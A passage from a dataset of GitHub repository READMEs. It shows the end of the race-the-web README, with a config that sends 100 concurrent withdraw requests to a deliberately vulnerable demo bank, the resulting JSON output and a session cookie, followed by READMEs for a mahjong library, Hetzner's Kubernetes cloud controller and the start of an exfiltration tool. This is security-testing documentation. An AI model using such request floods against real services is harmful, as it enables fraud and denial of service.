visibility):\n\n```JSON\n[\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
\\n
\\n

Welcome to SpeedBank, International

\\n
\\n
\\n \\n
\\n
\\n

You have successfully withdrawn $1

\\n
\\n
\\n \\n \\n
\\n

Balance: 9999

\\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
$
\\n \\n
.00
\\n
\\n
\\n \\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
\\n

Instructions

\\n
    \\n
  1. Click \u201cInitialize\u201d to initialize a bank account with $10,000.
  2. \\n
  3. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  4. \\n
  5. Repeat the request with race-the-web. Your config file should look like the following:
  6. \\n
    \\n# Make one request\\ncount = 100\\nverbose = true\\n[[requests]]\\n    method = \\\"POST\\\"\\n    url = \\\"http://racetheweb.io/bank/withdraw\\\"\\n    # Withdraw 1 dollar\\n    body = \\\"amount=1\\\"\\n    # Insert your sessionId cookie below.\\n    cookies = [\u201csessionId=<insert here>\\\"]\\n    redirects = false\\n
    \\n
  7. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.
  8. \\n
\\n
\\n
\\n
\\n \\n \\n \\n\\n

\\n Aaron Hnatiw 2017\\n

\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:29 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
\\n
\\n

Welcome to SpeedBank, International

\\n
\\n
\\n \\n
\\n
\\n

You have successfully withdrawn $1

\\n
\\n
\\n \\n \\n
\\n

Balance: 9998

\\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
$
\\n \\n
.00
\\n
\\n
\\n \\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
\\n

Instructions

\\n
    \\n
  1. Click \u201cInitialize\u201d to initialize a bank account with $10,000.
  2. \\n
  3. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  4. \\n
  5. Repeat the request with race-the-web. Your config file should look like the following:
  6. \\n
    \\n# Make one request\\ncount = 100\\nverbose = true\\n[[requests]]\\n    method = \\\"POST\\\"\\n    url = \\\"http://racetheweb.io/bank/withdraw\\\"\\n    # Withdraw 1 dollar\\n    body = \\\"amount=1\\\"\\n    # Insert your sessionId cookie below.\\n    cookies = [\u201csessionId=<insert here>\\\"]\\n    redirects = false\\n
    \\n
  7. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.
  8. \\n
\\n
\\n
\\n
\\n \\n \\n \\n\\n

\\n Aaron Hnatiw 2017\\n

\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:30 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
\\n
\\n
\\n

Welcome to SpeedBank, International

\\n
\\n
\\n \\n
\\n
\\n

You have successfully withdrawn $1

\\n
\\n
\\n \\n \\n
\\n

Balance: 9997

\\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
$
\\n \\n
.00
\\n
\\n
\\n \\n
\\n
\\n
\\n
\\n
\\n \\n
\\n
\\n

Instructions

\\n
    \\n
  1. Click \u201cInitialize\u201d to initialize a bank account with $10,000.
  2. \\n
  3. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  4. \\n
  5. Repeat the request with race-the-web. Your config file should look like the following:
  6. \\n
    \\n# Make one request\\ncount = 100\\nverbose = true\\n[[requests]]\\n    method = \\\"POST\\\"\\n    url = \\\"http://racetheweb.io/bank/withdraw\\\"\\n    # Withdraw 1 dollar\\n    body = \\\"amount=1\\\"\\n    # Insert your sessionId cookie below.\\n    cookies = [\u201csessionId=<insert here>\\\"]\\n    redirects = false\\n
    \\n
  7. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.
  8. \\n
\\n
\\n
\\n
\\n \\n \\n \\n\\n

\\n Aaron Hnatiw 2017\\n

\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:36 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 98\n }\n]\n```\n\n## Binaries\n\nThe program has been written in Go, and as such can be compiled to all the common platforms in use today. The following architectures have been compiled, and can be found in the [releases](https://github.com/insp3ctre/race-the-web/releases) tab:\n\n- Windows amd64\n- Windows 386\n- Linux amd64\n- Linux 386\n- OSX amd64\n- OSX 386\n\n## Compiling\n\nFirst, make sure you have Go installed on your system. If you don't you can follow the install instructions for your operating system of choice here: https://golang.org/doc/install.\n\nBuild a binary for your current CPU architecture\n\n```sh\n$ make build\n```\n\nBuild for all major CPU architectures (see [Makefile](https://github.com/insp3ctre/race-the-web/blob/master/Makefile) for details) at once\n\n```sh\n$ make\n```\n\n### Dep\n\nThis project uses [Dep](https://github.com/golang/dep) for dependency management. All of the required files are kept in the `vendor` directory, however if you are getting errors related to dependencies, simply download Dep\n\n```sh\n$ go get -u github.com/golang/dep/cmd/dep\n```\n\nand run the following command from the RTW directory in order to download all dependencies\n\n```sh\n$ dep ensure\n```\n\n### Go 1.7 and newer are supported\n\nBefore 1.7, the `encoding/json` package's `Encoder` did not have a method to escape the `&`, `<`, and `>` characters; this is required in order to have a clean output of full HTML pages when running these race tests. _If this is an issue for your test cases, please submit a [new issue](https://github.com/insp3ctre/race-the-web/issues) indicating as such, and I will add a workaround (just note that any output from a server with those characters will come back with unicode escapes instead)._ Here are the relevant release details from Go 1.7: https://golang.org/doc/go1.7#encoding_json.\n\n## The Vulnerability\n\n> A race condition is a flaw that produces an unexpected result when the timing of actions impact other actions. An example may be seen on a multithreaded application where actions are being performed on the same data. Race conditions, by their very nature, are difficult to test for.\n> - [OWASP](https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010))\n\nRace conditions are a well known issue in software development, especially when you deal with fast, multi-threaded languages.\n\nHowever, as network speeds get faster and faster, web applications are becoming increasingly vulnerable to race conditions. Often because of legacy code that was not created to handle hundreds or thousands of simultaneous requests for the same function or resource.\n\nThe problem can often only be discovered when a fast, multi-threaded language is being used to generate these requests, using a fast network connection; at which point it becomes a network and logic race between the client application and the server application.\n\nThat is where **Race The Web** comes in. This program aims to discover race conditions in web applications by sending a large amount of requests to a specific endpoint at the same time. By doing so, it may invoke unintended behaviour on the server, such as the duplication of user information, coupon codes, bitcoins, etc.\n\n**Warning:** Denial of service may be an unintended side-effect of using this application, so please be careful when using it, and always perform this kind of testing with the explicit permission of the server owner and web application owner.\n\nCredit goes to [Josip Franjkovi\u0107](https://twitter.com/josipfranjkovic) for his [excellent article on the subject](https://www.josipfranjkovic.com/blog/race-conditions-on-web), which introduced me to this problem.\n\n## Why Go\n\nThe [Go programming language](https://golang.org/) is perfectly suited for the task, mainly because it is *so damned fast*. Here are a few reasons why:\n\n- Concurrency: Concurrency primitives are built into the language itself, and extremely easy to add to any Go program. Threading is [handled by the Go runtime scheduler](https://morsmachine.dk/go-scheduler), and not by the underlying operating system, which allows for some serious performance optimizations when it comes to concurrency.\n- Compiled: *Cross-compiles* to [most modern operating systems](https://golang.org/doc/install/source#environment); not slowed down by an interpreter or virtual machine middle-layer ([here are some benchmarks vs Java](https://benchmarksgame.alioth.debian.org/u64q/go.html)). (Oh, and did I mention that the binaries are statically compiled?)\n- Lightweight: Only [25 keywords](https://golang.org/ref/spec#Keywords) in the language, and yet still almost everything can be done using the standard library.\n\nFor more of the nitty-gritty details on why Go is so fast, see [Dave Cheney](https://twitter.com/davecheney)'s [excellent talk on the subject](http://dave.cheney.net/2014/06/07/five-things-that-make-go-fast), from 2014.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fwhappy/mahjong", "link": "https://github.com/fwhappy/mahjong", "tags": [], "stars": 521, "description": "\u9ebb\u5c06\u7b97\u6cd5\u6c47\u603b", "lang": "Go", "repo_lang": "", "readme": "# \u9ebb\u5c06\u7b97\u6cd5\u5c01\u88c5\n\n* \u6b64\u5e93\u4e3b\u8981\u5305\u62ec\u4e86\n\t* \u724c\u5899\u7b97\u6cd5\n\t* \u542c\u724c\u7b97\u6cd5\n\t* \u80e1\u724c\u7b97\u6cd5\n\t* \u51fa\u724c\u63a8\u8350\u7b97\u6cd5\n\t* \u6269\u5c55\u73a9\u6cd5\u8bbe\u7f6e\n\n* \u9ebb\u5c06\u724c\u7684\u5b9a\u4e49\n\n~~~\n\t1 ~ 9 : \u4e00\u4e07 ~ 9\u4e07\n\t11 ~ 19 : \u4e00\u6761 ~ 9\u6761\n\t21 ~ 29 : \u4e00\u7b52 ~ 9\u7b52\n\t31 ~ 34 : \u4e1c\u5357\u897f\u5317\u98ce\n\t41 : \u53d1\u8d22\n\t42 : \u7ea2\u4e2d\n\t43 : \u767d\u677f\n\t51 ~ 54 : \u6625\u590f\u79cb\u51ac\n\t61 ~ 64 : \u56db\u79cd\u82b1\u8272\n~~~\n\n* \u724c\u5899\n\n~~~\nimport \"github.com/fwhappy/mahjong/wall\"\n\nfunc main() {\n\t// \u521d\u59cb\u5316\u724c\u5899\n\tw := wall.NewWall()\n\tw.SetTiles([]int{1,1,1,1,2,2,2,2})\n\t\n\t// \u6d17\u724c\n\tw.Shuffle()\n\t\n\t// \u4ece\u524d\u9762\u6293\u4e00\u5f20\n\twall.ForwardDraw()\n\t\n\t// \u4ece\u524d\u9762\u6293\u591a\u5f20\n\twall.ForwardDrawMulti()\n\t\n\t// \u4ece\u540e\u9762\u6293\u4e00\u5f20\n\twall.BackwardDraw()\n\t\n\t// \u662f\u5426\u5df2\u6293\u5b8c\n\twall.IsAllDrawn()\n}\n~~~\n\n* \u80e1\u724c\u7b97\u6cd5\n\n~~~\n\timport \"github.com/fwhappy/mahjong/win\"\n\t\n\tfunc main() {\n\t\t// \u624b\u724c\n\t\thandTiles := []int{1,2,3,4,5,6,7,7}\n\t\t// \u660e\u724c\n\t\tshowTiles := []int{}\n\t\t\n\t\t// \u6839\u636e\u7528\u6237\u624b\u724c\u548c\u660e\u724c\u6765\u5224\u65ad\u7528\u6237\u662f\u5426\u53ef\u4ee5\u80e1\u724c\n\t\tisWin := win.CanWin(handTiles, showTiles)\n\t}\n~~~\n\n* \u542c\u724c\u7b97\u6cd5\n\n~~~\n\timport \"github.com/fwhappy/mahjong/ting\"\n\t\n\tfunc main() {\n\t\t// \u6839\u636e\u624b\u724c\u3001\u5f03\u724c\u8ba1\u7b97\u5f53\u524d\u724c\u578b\uff0c\u6240\u6709\u542c\u724c\u7684\u53ef\u80fd\n\t\t// \u8fd4\u56demap[int][]int, \u8868\u793a\u6253\u51fakey\uff0c\u80fd\u80e1value\u4e2d\u7684\u8fd9\u4e9b\u724c\n\t\t// \u624b\u724c\n\t\thandTiles := []int{1,2,3,4,5,6,7,7}\n\t\t// \u660e\u724c\n\t\tshowTiles := []int{}\n\t\tting.GetTingMap(handTiles, showTiles)\n\t\t\n\t\t// \u68c0\u6d4b\u5f53\u524d\u624b\u724c\u3001\u5f03\u724c\u662f\u5426\u5df2\u505c\u724c\n\t\tting.CanTing(handTiles, showTiles)\n\t}\n~~~\n\n* \u9009\u724c\u7b97\u6cd5\uff08AI\uff09\n\n~~~\n\timport \"github.com/fwhappy/mahjong/suggest\"\n\t\n\tfunc main() {\n\t\tms := suggest.NewMSelector()\n\t\t\n\t\t// \u6839\u636e\u7528\u6237\u624b\u724c\u3001\u660e\u724c\uff0c\u5f03\u724c\uff08\u6240\u6709\u4eba\u7684\uff09\n\t\t// \u8ba1\u7b97\u51fa\u7528\u6237\u5f53\u524d\u5e94\u8be5\u51fa\u4ec0\u4e48\u724c\n\t\t\n\t\t// \u624b\u724c\n\t\thandTiles := []int{1,2,3,4,5,6,7,7}\n\t\t// \u660e\u724c\n\t\tshowTiles := []int{}\n\t\t// \u5f03\u724c\n\t\tdiscardTiles := []int{}\n\t\t\n\t\t// \u8bbe\u7f6e\u53c2\u6570\n\t\tms.SetAILevel(aiLevel) // AI\u7b49\u7ea7\n\t\tms.SetLack(lack)\t// \u7f3a\u7684\u724c\n\t\tms.SetHandTilesSlice(handTiles)\n\t\tms.SetShowTilesSlice(showTiles)\n\t\tms.SetDiscardTilesSlice(discardTiles)\n\t\t// \u9009\u724c\n\t\ttile := ms.GetSuggest()\n\t}\n~~~\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hetznercloud/hcloud-cloud-controller-manager", "link": "https://github.com/hetznercloud/hcloud-cloud-controller-manager", "tags": ["kubernetes", "hetzner", "hcloud", "hetzner-cloud"], "stars": 521, "description": "Kubernetes cloud-controller-manager for Hetzner Cloud", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes Cloud Controller Manager for Hetzner Cloud\n\n[![GitHub Actions status](https://github.com/hetznercloud/hcloud-cloud-controller-manager/workflows/Run%20tests/badge.svg)](https://github.com/hetznercloud/hcloud-cloud-controller-manager/actions)\n\nThe Hetzner Cloud cloud controller manager integrates your Kubernets\ncluster with the Hetzner Cloud API. Read more about kubernetes cloud\ncontroller managers in the [kubernetes\ndocumentation](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/).\n\n## Features\n\n* **instances interface**: adds the server type to the\n `beta.kubernetes.io/instance-type` label, sets the external ipv4 and\n ipv6 addresses and deletes nodes from Kubernetes that were deleted\n from the Hetzner Cloud.\n* **zones interface**: makes Kubernetes aware of the failure domain of\n the server by setting the `failure-domain.beta.kubernetes.io/region`\n and `failure-domain.beta.kubernetes.io/zone` labels on the node.\n* **Private Networks**: allows to use Hetzner Cloud Private Networks for\n your pods traffic.\n* **Load Balancers**: allows to use Hetzner Cloud Load Balancers with\n Kubernetes Services\n\n## Example\n\n```yaml\napiVersion: v1\nkind: Node\nmetadata:\n annotations:\n flannel.alpha.coreos.com/backend-data: '{\"VtepMAC\":\"06:b3:ee:88:92:36\"}'\n flannel.alpha.coreos.com/backend-type: vxlan\n flannel.alpha.coreos.com/kube-subnet-manager: \"true\"\n flannel.alpha.coreos.com/public-ip: 78.46.208.178\n node.alpha.kubernetes.io/ttl: \"0\"\n volumes.kubernetes.io/controller-managed-attach-detach: \"true\"\n creationTimestamp: 2018-01-24T15:59:45Z\n labels:\n beta.kubernetes.io/arch: amd64\n beta.kubernetes.io/instance-type: cx11 # <-- server type\n beta.kubernetes.io/os: linux\n topology.kubernetes.io/region: fsn1 # <-- location\n topology.kubernetes.io/zone: fsn1-dc8 # <-- datacenter\n kubernetes.io/hostname: master\n node-role.kubernetes.io/master: \"\"\n name: master\n resourceVersion: \"183932\"\n selfLink: /api/v1/nodes/master\n uid: 98acdedc-011f-11e8-9ed3-9600000780bf\nspec:\n externalID: master\n podCIDR: 10.244.0.0/24\n providerID: hcloud://123456 # <-- Server ID\nstatus:\n addresses:\n - address: master\n type: Hostname\n - address: 78.46.208.178 # <-- public ipv4\n type: ExternalIP\n```\n\n## Deployment\n\nThis deployment example uses `kubeadm` to bootstrap an Kubernetes\ncluster, with [flannel](https://github.com/coreos/flannel) as overlay\nnetwork agent. Feel free to adapt the steps to your preferred method of\ninstalling Kubernetes.\n\nThese deployment instructions are designed to guide with the\ninstallation of the `hcloud-cloud-controller-manager` and are by no\nmeans an in depth tutorial of setting up Kubernetes clusters.\n**Previous knowledge about the involved components is required.**\n\nPlease refer to the [kubeadm cluster creation\nguide](https://kubernetes.io/docs/setup/independent/create-cluster-kubeadm/),\nwhich these instructions are meant to argument and the [kubeadm\ndocumentation](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm/).\n\n1. The cloud controller manager adds its labels when a node is added to\n the cluster. For Kubernetes versions prior to 1.23, this means we\n have to add the `--cloud-provider=external` flag to the `kubelet`\n before initializing the cluster master with `kubeadm init`. To do\n accomplish this we add this systemd drop-in unit\n `/etc/systemd/system/kubelet.service.d/20-hcloud.conf`:\n\n ```\n [Service]\n Environment=\"KUBELET_EXTRA_ARGS=--cloud-provider=external\"\n ```\n\n Note: the `--cloud-provider` flag is deprecated since K8S 1.19. You\n will see a log message regarding this.\n\n2. Now the cluster master can be initialized:\n\n ```sh\n sudo kubeadm init --pod-network-cidr=10.244.0.0/16\n ```\n\n3. Configure kubectl to connect to the kube-apiserver:\n\n ```sh\n mkdir -p $HOME/.kube\n sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config\n sudo chown $(id -u):$(id -g) $HOME/.kube/config\n ```\n\n4. Deploy the flannel CNI plugin:\n\n ```sh\n kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/v0.9.1/Documentation/kube-flannel.yml\n ```\n\n5. Patch the flannel deployment to tolerate the `uninitialized` taint:\n\n ```sh\n kubectl -n kube-system patch ds kube-flannel-ds --type json -p '[{\"op\":\"add\",\"path\":\"/spec/template/spec/tolerations/-\",\"value\":{\"key\":\"node.cloudprovider.kubernetes.io/uninitialized\",\"value\":\"true\",\"effect\":\"NoSchedule\"}}]'\n ```\n\n6. Create a secret containing your Hetzner Cloud API token.\n\n ```sh\n kubectl -n kube-system create secret generic hcloud --from-literal=token=\n ```\n\n7. Deploy the `hcloud-cloud-controller-manager`:\n\n ```\n kubectl apply -f https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml\n ```\n\n## Networks support\n\nWhen you use the Cloud Controller Manager with networks support, the CCM is in favor of allocating the IPs (& setup the\nrouting) (Docs: https://kubernetes.io/docs/concepts/architecture/cloud-controller/#route-controller). The CNI plugin you\nuse needs to support this k8s native functionality (Cilium does it, I don't know about Calico & WeaveNet), so basically\nyou use the Hetzner Cloud Networks as the underlying networking stack.\n\nWhen you use the CCM without Networks support it just disables the RouteController part, all other parts work completely\nthe same. Then just the CNI is in charge of making all the networking stack things. Using the CCM with Networks support\nhas the benefit that your node is connected to a private network so the node doesn't need to encrypt the connections and\nyou have a bit less operational overhead as you don't need to manage the Network.\n\nIf you want to use the Hetzner Cloud `Networks` Feature, head over to\nthe [Deployment with Networks support\ndocumentation](./docs/deploy_with_networks.md).\n\nIf you manage the network yourself it might still be required to let the CCM know about private networks. You can do\nthis by adding the environment variable\nwith the network name/ID in the CCM deployment.\n\n```\n env:\n - name: HCLOUD_NETWORK\n valueFrom:\n secretKeyRef:\n name: hcloud\n key: network\n```\n\nYou also need to add the network name/ID to the\nsecret: `kubectl -n kube-system create secret generic hcloud --from-literal=token= --from-literal=network=`\n.\n\n## Kube-proxy mode IPVS and HCloud LoadBalancer\n\nIf `kube-proxy` is run in IPVS mode, the `Service` manifest needs to have the\nannotation `load-balancer.hetzner.cloud/hostname` where the FQDN resolves to the HCloud LoadBalancer IP.\n\nSee https://github.com/hetznercloud/hcloud-cloud-controller-manager/issues/212\n\n## Versioning policy\n\nWe aim to support the latest three versions of Kubernetes. After a new\nKubernetes version has been released we will stop supporting the oldest\npreviously supported version. This does not necessarily mean that the\nCloud Controller Manager does not still work with this version. However,\nit means that we do not test that version anymore. Additionally, we will\nnot fix bugs related only to an unsupported version. We also try to keep\ncompatibility with the respective k3s release for a specific Kubernetes\nrelease.\n\n### With Networks support\n\n| Kubernetes | k3s | Cloud Controller Manager | Deployment File |\n|------------|--------------:|-------------------------:|-----------------------------------------------------------------------------------------------------------:|\n| 1.26 | v1.26.0+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n| 1.25 | v1.25.5+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n| 1.24 | v1.24.9+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n| 1.23 | v1.23.15+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm-networks.yaml |\n\n### Without Networks support\n\n| Kubernetes | k3s | Cloud Controller Manager | Deployment File |\n|------------|--------------:|-------------------------:|--------------------------------------------------------------------------------------------------:|\n| 1.26 | v1.26.0+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n| 1.25 | v1.25.5+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n| 1.24 | v1.24.9+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n| 1.23 | v1.23.15+k3s1 | main | https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml |\n\n## Unit tests\n\nTo run unit tests locally, execute\n\n```sh\ngo test $(go list ./... | grep -v e2etests) -v\n```\n\nCheck that your go version is up to date, tests might fail if it is not.\n\nIf in doubt, check which go version the `test:unit` section in `.gitlab-ci.yml`\nhas set in the `image: golang:$VERSION`.\n\n## E2E Tests\n\nThe Hetzner Cloud cloud controller manager was tested against all\nsupported Kubernetes versions. We also test against the same k3s\nreleases (Sample: When we support testing against Kubernetes 1.20.x we\nalso try to support k3s 1.20.x). We try to keep compatibility with k3s\nbut never guarantee this.\n\nYou can run the tests with the following commands. Keep in mind, that\nthese tests run on real cloud servers and will create Load Balancers\nthat will be billed.\n\n**Test Server Setup:**\n\n1x CPX21 (Ubuntu 18.04)\n\n**Requirements: Docker and Go 1.19**\n\n1. Configure your environment correctly\n\n```bash\nexport HCLOUD_TOKEN=\nexport K8S_VERSION=k8s-1.21.0 # The specific (latest) version is needed here\nexport USE_SSH_KEYS=key1,key2 # Name or IDs of your SSH Keys within the Hetzner Cloud, the servers will be accessable with that keys\nexport USE_NETWORKS=yes # if `yes` this identidicates that the tests should provision the server with cilium as CNI and also enable the Network related tests\n## Optional configuration env vars:\nexport TEST_DEBUG_MODE=yes # With this env you can toggle the output of the provision and test commands. With `yes` it will log the whole output to stdout\nexport KEEP_SERVER_ON_FAILURE=yes # Keep the test server after a test failure.\n```\n\n2. Run the tests\n\n```bash\ngo test $(go list ./... | grep e2etests) -v -timeout 60m\n```\n\nThe tests will now run and cleanup themselves afterwards. Sometimes it might happen that you need to clean up the\nproject manually via the [Hetzner Cloud Console](https://console.hetzner.cloud) or\nthe [hcloud-cli](https://github.com/hetznercloud/cli) .\n\nFor easier debugging on the server we always configure the latest version of\nthe [hcloud-cli](https://github.com/hetznercloud/cli) with the given `HCLOUD_TOKEN` and a few bash aliases on the host:\n\n```bash\nalias k=\"kubectl\"\nalias ksy=\"kubectl -n kube-system\"\nalias kgp=\"kubectl get pods\"\nalias kgs=\"kubectl get services\"\n```\n\n## Local test setup\nThis repository provides [skaffold](https://skaffold.dev/) to easily deploy / debug this controller on demand\n\n### Requirements\n1. Install [hcloud-cli](https://github.com/hetznercloud/cli)\n2. Install [k3sup](https://github.com/alexellis/k3sup)\n3. Install [cilium](https://github.com/cilium/cilium-cli)\n4. Install [docker](https://www.docker.com/)\n\nYou will also need to set a `HCLOUD_TOKEN` in your shell session\n### Manual Installation guide\n1. Create an SSH key\n\nAssuming you already have created an ssh key via `ssh-keygen`\n```\nhcloud ssh-key create --name ssh-key-ccm-test --public-key-from-file ~/.ssh/id_rsa.pub \n```\n\n2. Create a server\n```\nhcloud server create --name ccm-test-server --image ubuntu-20.04 --ssh-key ssh-key-ccm-test --type cx11 \n```\n\n3. Setup k3s on this server\n```\nk3sup install --ip $(hcloud server ip ccm-test-server) --local-path=/tmp/kubeconfig --cluster --k3s-channel=v1.23 --k3s-extra-args='--no-flannel --no-deploy=servicelb --no-deploy=traefik --disable-cloud-controller --disable-network-policy --kubelet-arg=cloud-provider=external'\n```\n- The kubeconfig will be created under `/tmp/kubeconfig`\n- Kubernetes version can be configured via `--k3s-channel`\n\n4. Switch your kubeconfig to the test cluster. Very important: exporting this like \n```\nexport KUBECONFIG=/tmp/kubeconfig\n```\n\n5. Install cilium + test your cluster\n```\ncilium install\n```\n\n6. Add your secret to the cluster\n```\nkubectl -n kube-system create secret generic hcloud --from-literal=\"token=$HCLOUD_TOKEN\"\n```\n\n7. Install hcloud-cloud-controller-manager + test your cluster\n```\nkubectl apply -f https://github.com/hetznercloud/hcloud-cloud-controller-manager/releases/latest/download/ccm.yaml\nkubectl config set-context default\nkubectl get node -o wide\n```\n\n8. Deploy your CSI driver\n```\nSKAFFOLD_DEFAULT_REPO=naokiii skaffold dev\n```\n- `docker login` required\n- Skaffold is using your own dockerhub repo to push the CSI image.\n\nOn code change, skaffold will repack the image & deploy it to your test cluster again. Also, it is printing all logs from csi components.\n\n*After setting this up, only the command from step 8 is required!*\n\n## License\n\nApache License, Version 2.0\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "evilsocket/sg1", "link": "https://github.com/evilsocket/sg1", "tags": [], "stars": 521, "description": "A wanna be swiss army knife for data encryption, exfiltration and covert communication.", "lang": "Go", "repo_lang": "", "readme": "# SG1\n\n```\n _______ \n _,.--==###\\_/=###=-.._ \n ..-' _.--\\\\_//---. `-.. \n ./' ,--'' \\_/ `---. `\\. \n ./ \\ .,-' _,,......__ `-. / \\. \n /`. ./\\' _,.--'':_:'\"`:'`-..._ /\\. .'\\ \n / .'`./ ,-':\":._.:\":._.:\"+._.:`:. \\.'`. `. \n ,' // .-''\"`:_:'\"`:_:'\"`:_:'\"`:_:'`. \\ \\ \n / ,' /'\":._.:\":._.:\":._.:\":._.:\":._.`. `. \\ \n / / ,'`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_\\ \\ \\ \n ,\\\\ ; /_.:\":._.:\":._.:\":._.:\":._.:\":._.:\":\\ ://, \n / \\\\ /'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\\ // \\. \n |//_ \\ ':._.:\":._.+\":._.:\":._.:\":._.:\":._.:\":._\\ / _\\\\ \\ \n /___../ /_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"'. \\..__ | \n | | '\":._.:\":._.:\":._.:\":._.:\":._.:\":._.:\":._.| | | \n | | |-:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`| | | \n | | |\":._.:\":._.:\":._.:\":._.:\":._.+\":._.:\":._.| | | \n | : |_:'\"`:_:'\"`:_+'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`| ; | \n | \\ \\.:._.:\":._.:\":._.:\":._.:\":._.:\":._.:\":._| / | \n \\ : \\:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'.' ; | \n \\ : \\._.:\":._.:\":._.:\":._.:\":._.:\":._.:\":,' ; / \n `. \\ \\..--:'\"`:_:'\"`:_:'\"`:_:'\"`:_:'\"`-../ / / \n `__.`.'' _..+'._.:\":._.:\":._.:\":._.:\":.`+._ `-,:__` \n .-'' _ -' .'| _________________________ |`.`-. `-.._ \n _____' _..-|| :.' .+/;;';`;`;;:`)+(':;;';',`\\;\\|. `,'|`-. `_____\n MJP .-' .'.' :- ,'/,',','/ /./|\\.\\ \\`,`,-,`.`. : `||-.`-._ \n .' ||.-' ,','/,' / / / 